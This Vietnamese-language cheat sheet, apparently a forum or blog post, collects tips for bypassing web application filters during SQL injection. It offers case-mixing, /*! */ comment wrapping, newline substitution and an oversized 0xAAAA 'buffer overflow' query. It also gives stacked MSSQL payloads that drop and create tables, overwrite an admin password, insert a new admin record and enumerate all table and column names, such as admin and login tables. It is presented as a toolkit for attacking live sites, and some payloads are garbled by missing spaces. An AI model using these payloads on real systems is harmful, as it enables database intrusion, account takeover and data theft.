Tổng kết một số mẹo bypass SQLi

- Khi query 1 số site chặn các hàm union,select,convert…thì khi query nó trả về trang trắng, lúc này ta thay đổi 1 số chữ Hoa, thường xen kẽ nhau: UniON, SeLECt… hoặc conveter sang ascii

- Khi query cũng có 1 số site trả về trang trắng, thì ta nhìn kỹ trên site nha,kể cả title site.Nếu ko thấy ae view source sẽ thấy

- 1 số query table_name không hiện ra , ta unhex(hex(group_concat(table_name))

- Khi query nó trả về thế này
Forbidden
You don’t have permission to access /news.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Hoặc

Not Acceptable
An appropriate representation of the requested resource / could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request

Thì ta dùng /*! */ (VD: /*!union*/ hoặc /*!select*/ hoặc information_schema./*!tables*/..vv)

-Nếu query nó ra thế này:
406 Not Acceptable
This request is not acceptable Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!
Thì các bạn cần tư duy chút. VD: các bạn có thể thay space = %0A (kí tự xuống dòng) ..vv

Còn lỡ gặp error này:
Error 500: Internal Server Error
The server encountered an unexpected condition which prevented it from fulfilling the request.

The problem is on the server side, not with your browser or the address. Most probably, a certain service (e.g., Tomcat engine) is down. Please contact your webmaster.
thì các bạn sử dụng buffer overflow query 

id=.. and (select 1)=(select 0xAAAAAAAAAAAAAAAA 1000 A nhé) union select 1,2,3....

1 Số truy vấn khác
-Tạo 1 table_name:
;drop table kingnuscreate table thanggiangho (id int identity,kingnusvarchar(99999)) insert into kingnusselect table_name from information_schema.tables–sp_password

-Thay đổi pass admin: lấy vd trên nếu như username :kingnus/pass:ceh
;UPDATE table1 SET password = ‘ceh’ WHERE username=’kingnus’–

-Chèn 1 record mới vào table
;INSERT INTO ‘table1′ (‘ID’, ‘username’, ‘password’, ‘details’) VALUES (99,’kingnus’,’ceh’,’Online’)–

-Tìm tất cả các table có liên quan như: admin,user,member,account,login…
and 1 = convert(int,(select top 1 table_name from information_schema.tables where table_name like ‘%admin%’ or table_name like ‘%Member%’ or table_name like ‘%User%’ or table_name like ‘%account%’ or table_name like ‘%login%’))–sp_password

and 1 = convert(int,(select top 1 table_name from information_schema.tables where table_name not in (”) and (table_name like ‘%25admin%25′ or table_name like ‘%25Member%25′ or table_name like ‘%25User%25′ or table_name like ‘%25account%25′ or table_name like ‘%25login%25′)))–sp_password

-Lấy tất cả các table_name:
; begin declare @temp varchar(8000) set @temp=’:’ select @temp=@temp%2btable_name%2b’/’ from information_schema.tables select @temp as id into kingnusend–
or 1=(select id from kingnus)–
; drop table kingnus–

-Lấy tất cả các column_name từ 1 table_name: vd table_name : tbadmin

; begin declare @temp varchar(8000) set @temp=’:’ select @temp=@temp%2bcolumn_name%2b’/’ from information_schema.columns where table_name=’tbadmin’ select @temp as id into kingnus end–
or 1=(select id from kingnus)–